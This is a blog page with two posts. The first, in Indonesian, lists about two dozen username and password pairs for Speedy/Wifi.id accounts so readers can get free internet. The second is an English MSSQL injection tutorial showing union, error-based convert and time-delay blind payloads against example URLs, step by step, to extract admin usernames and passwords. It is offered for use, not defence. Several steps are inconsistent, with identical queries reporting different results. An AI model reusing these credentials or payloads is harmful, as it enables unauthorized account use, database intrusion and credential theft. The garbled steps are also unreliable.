Powered by Blogger.
Monday, September 23, 2013

Cara Internetan Gratis Menggunakan Wifi Id

Kali ini saya membagikan Tips and Trick tentang "Cara Internetan Gratis Menggunakan Wifi Id". OK, caranya langsung konek ke @wif.id lalu pilih Speedy dan langsung aja dicoba satu-satu username sama password di bawah.

Username: 111135100015
Password: 522670

Username: 111135100018
Password: 21297

Username: 111135100019
Password: 522775

Username: 111135100020
Password: 523098

Username: 111135100021
Password: 21135

Username: 111135100022
Password: 21444

Username: 111135100025
Password: 21020

Username: 111135100338
Password: 2524201

Username: 111135100342
Password: 21031

Username: 111135100343
Password: 2524203

Username: 111135100353
Password: 21482

Username: 111135100356
Password: 2524595

Username: 111135100359
Password: 2524207

Username: 111135100360
Password: 2524208

Username: 111135100362
Password: 21495

Username: 111135100364
Password: 2524885

Username: 111135100366
Password: 21709

Username: 111135100367
Password: 21032

Username: 111135100370
Password: 2524211

Username: 111135100371
Password: 2524092

Username: 111135100373
Password: 2524213

Username: 111135100374
Password: 2524591

Username: 111135100376
Password: 2524598

Username: 111135100383
Password: 2522

Silahkan dicoba, lumayan bisa nyampe 1MBps :D

Tutorial MySql Injection

Welcome to my complete MsSQL Injection Tutorial. 
Today I'm going to show you 3 ways. 
Union Attack
Convert Attack
Blind Injection (Time Delay)
Okay so lets start... 

[~] MsSQL - Union Attack. [~]


So lets say our target is: http://www.crysan.edu/manager.asp?id=14 

We can find the column count by order by clause. 
This works just like the MySQL Union Based method. 

http://www.crysan.edu/manager.asp?id=14 ORDER BY 1-- 

We get something like: 
Quote:
ADODB.Recordset Error '800a0bcd ' 

Either BOF or EOF is True, or the current record has been deleted requested operation requires a current record. 

/ manager.asp, line 10


Let's encrease 1 to 2, 2 to 3 etc... 

http://www.crysan.edu/manager.asp?id=14 ORDER BY 2-- 
http://www.crysan.edu/manager.asp?id=14 ORDER BY 3-- 
http://www.crysan.edu/manager.asp?id=14 ORDER BY 4-- 
... 
http://www.crysan.edu/manager.asp?id=14 ORDER BY 13-- 

...until we get an error like that: 
Quote:
Microsoft OLE DB Provider for ODBC Drivers Error '80040e14 ' 

[Microsoft] [ODBC SQL Server Driver] [SQL Server] The number of ORDER BY position 13 is outside the range of elements in the select list. 

/ manager.asp, line 9


This means our column count is: 12. 

If this is not working use string: 
http://www.crysan.edu/manager.asp?id=-14' and 1=2 ORDER BY 13-- 

This should work :), if not you can try the other 2 methods. 

Now we select every column to see with which one we can readout the details we want. 

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12-- 

As we can see 2 , 12, 10 etc. can be used for our attack. 
I will use 12. 

Let's see if we can get the name from the current database. 

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,db_name()-- 

Now we can see the current database name where the number 12 was. 
Lets say the database name of our example is: crysan_db 

Lets read the tables from crysan_db. 

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,table_name from information_schema.tables-- 

Now we will get the first table of the database. 

Lets say its: tutorial_pictures. 
Thats not the table we want to see. 

So let's see whats the name of the next table. 

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,table_name from information_schema.tables where table_name not in ('tutorial_pictures')-- 

Now we will see the next table: tutorial_category. 
Mhm, still not the table we would like to see. 

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,table_name from information_schema.tables where table_name not in ('tutorial_pictures','tutorial_category')--[/color] 

Do this until you found the table you wanted. 
If its blank, you reached the end. 

Finally we got this: tutorial_admin_users. 
Fine, lets go to the next step. 

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,column_name from information_schema.columns where table_name='tutorial_admin_users'-- 

We will see the first column in the table. 
Lets say its: id 

So what to do as next ? Right !  
http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,column_name from information_schema.columns where table_name='tutorial_admin_users' and column_name not in ('id')-- 

Now we can see the next column is: t_usr 

Let's redo the last step to get the next column. 
http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,column_name from information_schema.columns where table_name='tutorial_admin_users' and column_name not in ('t_usr')-- 

Result: t_pwd 

Finally we got this. 

Database: crysan_db 
Table: tutorial_admin_users 
Columns: id, t_usr, t_pwd 

Lets get the admin details =) 

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,t_usr from tutorial_admin_users-- 

Result: admin 

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,t_usr from tutorial_admin_users-- 

Result: 5683 

If we want to get the details from the next user: 
http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,t_usr from tutorial_admin_users where t_usr not in ('admin')-- 

[~] MsSQL - Convert Attack. [~]


This is my favorite way :3 
Our target for this is as example: http://sub.crysan.gov/news.asp?game=1 

Okay, lets get the database. 

http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,db_name)-- 

We should get an error message like that: 
Quote:
Microsoft OLE DB Provider for ODBC Drivers Error '80040e07 ' 

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value 'intranet' to a column of data type int. 

news.asp, line 9


Okay, we know now that the database name is: intranet 
Lets get the tables. 

http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+table_name+from+information_sche?ma.tables))-- 

Now the same game like on the union attack. 
We got trough that syntax the first table from the database. 
Its: apfel_ficker 

Time for the next table. 
http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+table_name+from+information_sche?ma.tables+where+table_name+not+in+('apfel_ficker')))-- 

The next table is: sperma_schleuder 

http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+table_name+from+information_sche?ma.tables+where+table_name+not+in+('apfel_ficker','sperma_schleuder')))-- 

We do this until we get what we want. 
Lets say we found: lappen_user 

Ofcourse we need now to get the columns. 

http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+column_name+from+information_sch?ema.columns+where+table_name='lappen_user'))-- 

Its the same thing here like above. 
http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+column_name+from+information_sch?ema.columns+where+table_name='lappen_user+and+column_name+not+in+('id')))-- 
http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+column_name+from+information_sch?ema.columns+where+table_name='lappen_user+and+column_name+not+in+('id','username?')))-- 

Columns; ID, username, passwd 

Now we only need to read the data out. 
http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+username+from+lappen_user))-- 
Now we see that the username is admin. 
Lets get the password. 

http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+passwd+from+lappen_user))-- 
Now we got the password. 

If we want to get the details from the next user: 
http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+username+from+lappen_user+where+?username+not+in+('admin')))-- 

[~] MsSQL - Blind (Time Delay). [~]


Okay this will be the last way I show you. 
Why not normal blind ? Because this seems to work better. 

Target: http://crysan.cat/wrd/nyan.asp?cat=155 

If we do this: 
http://crysan.cat/wrd/nyan.asp?cat=155; WAITFOR DELAY '00:00:05'-- 

The database takes 5 seconds to response. 
Time to get the database :) 

http://crysan.cat/wrd/nyan.asp?cat=155; IF (len(db_name)=1) WAITFOR DELAY '00:00:05'-- 
Directly we get an error. 

1 stands for the char count, means if the database name is intra. 
It haves 5 chars, so our syntax would look like: 
http://crysan.cat/wrd/nyan.asp?cat=155; IF (len(db_name)=5) WAITFOR DELAY '00:00:05'-- 

Just put the char higher until the site takes 5 seconds to response/load. 
As example; If we try 
http://crysan.cat/wrd/nyan.asp?cat=155; IF (len(db_name)=24) WAITFOR DELAY '00:00:05'-- 

And the page loads 5 seconds, the database name is 24 chars long. 
This is important to understand for the next steps. 

It's time to get the name of the db. 
We know that our db name is 5 chars long. 

We are going to use ascii. 
Here is an ascii to char list: http://pastebin.com/BfzH9EXt 
You will need it for our next step. 

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),1,1)))>97) WAITFOR DELAY '00:00:05'-- - Loads directly. 
(97 is the place where to enter the ascii, just change it to the ascii you want to test.) 

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),1,1)))>98) WAITFOR DELAY '00:00:05'-- - Loads directly. 

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),1,1)))>99) WAITFOR DELAY '00:00:05'-- - Takes 5 seconds to load. 

Now we know the first char from the database name is: c 

Now we need to get the 2'nd char. 

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),2,1)))>111) WAITFOR DELAY '00:00:05'-- - Loads directly. 
(As you cann see I changed the 1 to 2, means we want know to know the 2'nd char. Change to 3 for 3'nd char and and and...) 

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),2,1)))>112) WAITFOR DELAY '00:00:05'-- - Loads directly. 

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),2,1)))>113) WAITFOR DELAY '00:00:05'-- - Takes 5 seconds to load. 

We know now the 2'nd char is: q 

Keep doing that until you have all 5 chars. 
Lets just say the database is: intra. 

Time to get the tables  

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 NAME FROM sysobjects WHERE xtype=char(85)),1,1)))=97) WAITFOR DELAY '00:00:05'-- - Loads directly. 

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 NAME FROM sysobjects WHERE xtype=char(85)),1,1)))=97) WAITFOR DELAY '00:00:05'-- - Takes 5 seconds to load. 

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 NAME FROM sysobjects WHERE xtype=char(85)),2,1)))=120) WAITFOR DELAY '00:00:05'-- - Loads directly. 

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 NAME FROM sysobjects WHERE xtype=char(85)),2,1)))=121) WAITFOR DELAY '00:00:05'-- - Loads directly. 

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 NAME FROM sysobjects WHERE xtype=char(85)),2,1)))=122) WAITFOR DELAY '00:00:05'-- - Takes 5 seconds to load. 

The second char is: z 
Do you got the point ? Yea ? Fine  

Lets say the table is: admin 

Now its time to ? Right !, drink a coffe and get the columns. 

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 column_name FROM CEE.information_schema.columns WHERE table_name='admin'),1,1)))=99) WAITFOR DELAY '00:00:05'-- - Loads directly. 

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 column_name FROM CEE.information_schema.columns WHERE table_name='admin'),1,1)))=100) WAITFOR DELAY '00:00:05'-- - Takes 5 seconds to load. 

I guess you know the rest ;). 
Now the final part... 

The Column we got from the step above is: usr_name 

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(substring((SELECT TOP 1 usr_name FROM admin),1,1))=97) WAITFOR DELAY '00:00:05'-- - Takes 5 seconds to load 

First char is: a 

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(substring((SELECT TOP 1 usr_name FROM admin),2,1))=98) WAITFOR DELAY '00:00:05'-- - Loads directly. 

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(substring((SELECT TOP 1 usr_name FROM admin),2,1))=99) WAITFOR DELAY '00:00:05'-- - Takes 5 seconds to load. 

I think I don't need to continue here, I guess you understand it now. Hope it usefull :)